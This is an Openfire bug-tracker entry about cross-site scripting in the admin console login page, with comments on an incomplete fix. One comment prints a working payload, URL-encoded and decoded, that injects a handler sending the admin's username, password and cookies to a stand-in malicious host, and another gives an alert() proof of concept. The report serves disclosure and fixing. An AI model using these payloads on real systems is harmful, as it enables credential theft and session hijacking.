Openfire

Cross-site scripting attack in the login form

Details

  • Type: Bug
  • Status: Resolved
  • Priority: Blocker
  • Resolution: Fixed
  • Affects Version/s: 3.6.4
  • Fix Version/s: 3.7.0 beta
  • Component/s: Admin Console
  • Labels: None

Description

As reported by a community member, there is a cross-site scripting vulnerability in the login page of the admin console. Although it's unlikely to be exploited, it's important to get it fixed.

Activity

Matt Tucker added a comment -

Only the "user" param seemed to be vulnerable. If anyone else can find issues, please post them as comments.

Juan Carlos Calderon added a comment -

Hello guys

I'm afraid this issue was not completely fixed. The problem still exists for the "url" parameter, and the fix implementation for the "username" parameter has failed, since an XSS attack without a less-than character,
like the following, is still working. The following attack implements a small function to steal admin credentials and send them to a (fictitious) malicious site; it is fully functional:
http://JiveServer:9090/login.jsp?username=%22+onchange%3D%27document.loginForm.onsubmit%3Drobit%3Bfunction+robit%28%29+%7Bvar+image%3Bimage+%3D+new+Image%28%29%3Bimage.src+%3D+%22http%3A%2F%2Fwww.malicioussite.com%2FGet.asp%3FUsuario%3D%22+%2B+loginForm.username.value+%2B+%22%26Password%3D%22+%2B+loginForm.password.value+%2B+%22%26cookies%3D%22+%2B+document.cookie%7D%27+me%3D%22

URL decoded
http://JiveServer:9090/login.jsp?username=" onchange='document.loginForm.onsubmit=robit;function robit() {var image;image = new Image();image.src = "http://www.malicioussite.com/Get.asp?Usuario=" + loginForm.username.value + "&Password=" + loginForm.password.value + "&cookies=" + document.cookie}' me="

Please check the following resource for more information on different possible attacks.
http://ha.ckers.org/xss.html

Regards,
JC

davesan added a comment -

I looked around, but I didn't see anything more on this. It appears to be marked "fixed", but the admin console, as of version 3.6.4, is still vulnerable to XSS.

e.g.,
http://../openfire/login.jsp?url=%2Findex.jsp&login=&username=%22%20onclick=%22alert(%27xss%27)&password=

Daryl Herzmann added a comment -

Reopening.

Guus der Kinderen added a comment -

Fixed the XSS on the login screen.

Yehuda Katz added a comment -

I am not sure the correct solution is to just strip these characters.
My understanding is that some of the characters that function strips could be valid username characters, and while the likelihood of someone using them is low, I would hate to see functionality in the program arbitrarily broken to fix this bug.

I would contribute a fix, but I am having some trouble getting Eclipse to work, and that is my editor of choice.

